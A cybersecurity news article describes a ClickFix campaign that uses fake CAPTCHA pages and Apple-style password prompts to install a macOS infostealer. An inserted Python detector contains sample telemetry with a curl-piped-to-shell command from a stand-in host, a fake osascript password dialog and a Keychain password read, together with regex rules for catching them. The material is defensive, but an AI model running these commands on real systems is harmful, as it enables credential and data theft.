A new ClickFix campaign is targeting macOS users with fake CAPTCHA pages and deceptive Apple-style prompts, tricking victims into running AppleScript malware that steals browser passwords, session cookies, Keychain data and cryptocurrency wallet information, while exposing the growing power of social engineering in cybercrime.

ClickFix Cyber Attack Triggers Global Alert: Browsers, Wallets and Passwords at Risk

The420 Web Desk

A new cyberattack campaign targeting macOS users has emerged as a serious global security concern, with attackers deploying an AppleScript-based infostealer through a social engineering technique known as “ClickFix.” The malware is designed to steal highly sensitive user data, including browser passwords, session cookies, cryptocurrency wallet information, and data from hundreds of browser extensions.

According to cybersecurity researchers, the campaign has been active since at least last month, with new incidents continuing to surface in recent weeks. The attack appears to be primarily focused on users in Asia, particularly those working in the financial sector, suggesting a coordinated and financially motivated cyber operation.

The most dangerous aspect of this attack is its method of deception. Victims are first redirected to fake CAPTCHA verification pages that closely resemble legitimate websites. Users are then instructed to copy a “verification code” and paste it into macOS Spotlight. In reality, this code is a malicious command that silently executes a “curl” request, downloading malware from an attacker-controlled server and activating it on the system.

Once executed, the malware collects system information such as usernames and creates hidden directories to store stolen data. This information is then transmitted to remote command-and-control servers operated by the attackers.

One of the most alarming elements of the campaign is its credential-harvesting technique. The malware displays a fake macOS security dialog box that closely mimics genuine Apple system alerts, using authentic system icons to appear legitimate. The dialog repeatedly reappears until the user enters their password, effectively coercing victims into revealing their system credentials.

Once entered, the password is immediately captured and sent to the attackers. In addition, the malware extracts data from macOS Keychain, including saved passwords, Wi-Fi credentials, secure notes, and encryption keys.
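Added example (not code from the article or the researchers it cites): a small Python detector that reads constructed JSON-lines process telemetry and flags the stages described above, namely a pasted command that pipes a curl download into a shell, an AppleScript `display dialog ... with hidden answer` password prompt, and a subsequent Keychain password read, then correlates them per host. The log format, hostnames, user names and the `c2.invalid` URL are all constructed for the example.

```python
import json
import re

# Constructed sample telemetry (not from the article): one JSON process event per line.
SAMPLE_EVENTS = r"""
{"host":"mac-01","user":"alice","parent":"Spotlight","process":"sh","cmd":"sh -c 'curl -fsSL http://c2.invalid/p | sh'"}
{"host":"mac-01","user":"alice","parent":"sh","process":"osascript","cmd":"osascript -e 'display dialog \"macOS needs to verify your password\" default answer \"\" with hidden answer'"}
{"host":"mac-01","user":"alice","parent":"osascript","process":"security","cmd":"security find-generic-password -ga alice"}
{"host":"mac-02","user":"bob","parent":"Terminal","process":"curl","cmd":"curl -O https://example.com/report.pdf"}
{"host":"mac-02","user":"bob","parent":"Terminal","process":"osascript","cmd":"osascript -e 'display notification \"build done\"'"}
"""

# One rule per stage of the chain: download-and-run, fake password dialog, Keychain read.
# "with hidden answer" is the AppleScript idiom for a masked password field;
# "security ... -g" prints the stored password for the matching Keychain item.
RULES = {
    "curl_piped_to_shell": re.compile(r"\bcurl\b.*\|\s*(sh|bash|zsh)\b"),
    "hidden_answer_dialog": re.compile(r"display dialog.*with hidden answer"),
    "keychain_password_read": re.compile(r"\bsecurity\b.*find-(generic|internet)-password.*\s-\w*g"),
}

def parse_events(text):
    """Parse JSON-lines telemetry, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]

def classify(event):
    """Return the names of the rules whose pattern matches the event's command line."""
    cmd = event.get("cmd", "")
    return [name for name, pattern in RULES.items() if pattern.search(cmd)]

def find_chains(events):
    """Group rule hits per host, in event order. A host where a shell download is
    followed by a hidden-answer dialog is flagged as a ClickFix-style chain; any
    later Keychain read on that host is reported alongside it."""
    hits = {}
    for event in events:
        for rule in classify(event):
            hits.setdefault(event["host"], []).append(rule)
    flagged = {}
    for host, rules in hits.items():
        if ("curl_piped_to_shell" in rules and "hidden_answer_dialog" in rules
                and rules.index("curl_piped_to_shell") < rules.index("hidden_answer_dialog")):
            flagged[host] = rules
    return flagged

if __name__ == "__main__":
    for host, rules in find_chains(parse_events(SAMPLE_EVENTS)).items():
        print(f"{host}: ClickFix-style chain -> {' -> '.join(rules)}")
```

The `mac-02` events show that a plain curl download or an ordinary `display notification` from Terminal does not trip the chain, which keeps the correlation from firing on routine developer activity.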

The attack is not limited to system-level credentials. It also targets all major Chromium-based browsers, including Google Chrome, Microsoft Edge, Brave, Opera, and others. From these browsers, attackers steal session tokens, cookies, autofill data, saved passwords, and even credit card information.

Furthermore, more than 200 browser extensions are affected, including major cryptocurrency wallets such as MetaMask, Phantom, Trust Wallet, and Coinbase Wallet. Popular password managers like 1Password, Bitwarden, Dashlane, and LastPass are also targeted, along with authentication tools such as Authy and Google Authenticator extensions.

Security experts note that the malware is designed to exploit user trust and momentary mistakes. Once inside a system, it operates silently and continuously exfiltrates data without the victim’s awareness.

Apple has introduced several security enhancements in recent macOS versions, including warnings when users attempt to paste potentially harmful commands into system terminals. However, users running outdated systems or those who ignore security warnings remain vulnerable.

Experts emphasize that this attack highlights a major shift in cyber threats, where attackers are increasingly relying on human manipulation rather than technical vulnerabilities. Fake interfaces, social engineering tactics, and deceptive system prompts have become key tools in modern cybercrime.

Overall, the ClickFix campaign underscores a growing trend in cybersecurity threats, where digital deception is as dangerous as malware itself. As cyberattacks become more sophisticated, user awareness and cautious behavior are becoming just as important as technical defenses.